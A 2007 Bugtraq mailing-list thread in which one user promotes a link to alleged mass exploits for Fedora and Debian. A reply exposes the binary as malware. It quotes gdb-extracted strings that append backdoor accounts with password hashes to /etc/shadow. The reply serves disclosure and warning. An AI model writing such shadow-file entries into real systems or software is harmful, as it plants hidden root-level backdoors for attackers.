Bugtraq mailing list archives

Re: Found nice mass exploits for fedora and imap

From: jf <jf () danglingpointers net>
Date: Tue, 28 Aug 2007 22:54:44 +0000 (UTC)

heh, dude seriously, at least learn to strip -s your bin's.

FYI this is malware, it does things like:

(gdb) x/s 0x80494e0
0x80494e0 <__dso_handle+816>:    "echo
toor:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>:    "echo
newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"

Interestingly enough, the only newb here is you.

On Tue, 28 Aug 2007, linux0day () yahoo co uk wrote:

Date: 28 Aug 2007 01:33:20 -0000
From: linux0day () yahoo co uk
To: bugtraq () securityfocus com
Subject: Found nice mass exploits for fedora and imap

Hello bugtraq,
Did somebody realize a new mass exploits is realeased to public, it's seems work for fedora core 5, 6 and debian 3.1 
with exploiting apache and imap.

I've found this link somedays ago in a security forum, check this out

http://rufy.com/images/mass/

Current thread:

Found nice mass exploits for fedora and imap linux0day (Aug 28)
- Re: Found nice mass exploits for fedora and imap jf (Aug 28)
- Re: Found nice mass exploits for fedora and imap Jon Lewis (Aug 28)